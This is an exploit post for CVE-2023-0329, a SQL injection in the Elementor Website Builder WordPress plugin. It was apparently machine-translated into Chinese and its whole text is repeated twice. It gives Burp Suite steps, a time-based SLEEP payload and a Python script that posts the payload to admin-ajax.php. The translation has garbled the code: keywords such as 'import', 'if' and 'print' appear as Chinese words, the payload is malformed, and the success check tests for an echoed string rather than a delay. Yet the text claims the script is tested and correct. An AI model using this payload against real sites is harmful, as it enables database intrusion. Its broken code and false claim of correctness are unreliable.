#Exploit Elementor网站Builder 3.12.2-管理员+ SQLI
#参考
#CVE : CVE-2023-0329
#e1.coders
#开放式Burp Suite。
#在Burp Suite中,转到“代理”选项卡,然后将其设置为在特定端口(例如8080)上收听。
#打开一个新的浏览器窗口或选项卡,然后将代理设置设置为在端口8080上使用Burp Suite。
#visit“脆弱的Elementor网站构建器网站”并导航到工具替换URL页面。
#on替换URL页面,输入任何随机字符串作为“新URL”和以下恶意有效载荷作为“旧URL” :
#code : http://localhost:8080/?test'),meta_key='key4'where where+meta_id=sleep=sleep(2);##
#press“替换URL”在替换URL页面上。 Burp Suite应拦截该请求。
#通过右键单击Burp Suite中的请求并选择“向前”,请向服务器截取的请求。
#服务器将执行SQL命令,这将导致其悬挂2秒钟,然后再响应。这清楚地表明了成功的SQL注入。
#Note:确保您有权执行这些测试并正确设置Burp Suite。此命令可能会根据服务器和网站Builder插件的特定设置而有所不同。/s
#
#References : https://wpscan.com/vulnerability/A875836D-77F4-4306-B275-2B60EFF1493/
#Exploit Python :
#提供的SQLI攻击向量可以使用以下Python代码和“请求”库:实现
#本脚本以SQLI有效载荷为“数据”参数将邮政请求发送给目标URL。然后,它检查响应是否包含SQLI有效载荷,表明成功的SQL注入。
#请确保您已经正确设置了Burp Suite环境。此外,重要的是要注意,此脚本和攻击已经进行了测试,并且是正确的
导入请求
#设置目标URL和SQLI有效载荷
url='http://localhost:8080/wp-admin/admin-ajax.php'
数据={
'action':'elementor_ajax_save_builder',
'editor_post_id':'1',
'post_id':'1',
'data':'test'),meta_key='key4'where+meta_id=sleep(2);#'
}
#将请求发送到目标URL
响应=requests.post(url,data=data)
#检查响应是否表示成功的SQL注入
如果'meta_key='key4'where+meta_id=sleep(2);#'wendesp.text:
打印('SQL注入成功!')
其他:
打印('SQL注射失败。')
#参考
#CVE : CVE-2023-0329
#e1.coders
#开放式Burp Suite。
#在Burp Suite中,转到“代理”选项卡,然后将其设置为在特定端口(例如8080)上收听。
#打开一个新的浏览器窗口或选项卡,然后将代理设置设置为在端口8080上使用Burp Suite。
#visit“脆弱的Elementor网站构建器网站”并导航到工具替换URL页面。
#on替换URL页面,输入任何随机字符串作为“新URL”和以下恶意有效载荷作为“旧URL” :
#code : http://localhost:8080/?test'),meta_key='key4'where where+meta_id=sleep=sleep(2);##
#press“替换URL”在替换URL页面上。 Burp Suite应拦截该请求。
#通过右键单击Burp Suite中的请求并选择“向前”,请向服务器截取的请求。
#服务器将执行SQL命令,这将导致其悬挂2秒钟,然后再响应。这清楚地表明了成功的SQL注入。
#Note:确保您有权执行这些测试并正确设置Burp Suite。此命令可能会根据服务器和网站Builder插件的特定设置而有所不同。/s
#
#References : https://wpscan.com/vulnerability/A875836D-77F4-4306-B275-2B60EFF1493/
#Exploit Python :
#提供的SQLI攻击向量可以使用以下Python代码和“请求”库:实现
#本脚本以SQLI有效载荷为“数据”参数将邮政请求发送给目标URL。然后,它检查响应是否包含SQLI有效载荷,表明成功的SQL注入。
#请确保您已经正确设置了Burp Suite环境。此外,重要的是要注意,此脚本和攻击已经进行了测试,并且是正确的
导入请求
#设置目标URL和SQLI有效载荷
url='http://localhost:8080/wp-admin/admin-ajax.php'
数据={
'action':'elementor_ajax_save_builder',
'editor_post_id':'1',
'post_id':'1',
'data':'test'),meta_key='key4'where+meta_id=sleep(2);#'
}
#将请求发送到目标URL
响应=requests.post(url,data=data)
#检查响应是否表示成功的SQL注入
如果'meta_key='key4'where+meta_id=sleep(2);#'wendesp.text:
打印('SQL注入成功!')
其他:
打印('SQL注射失败。')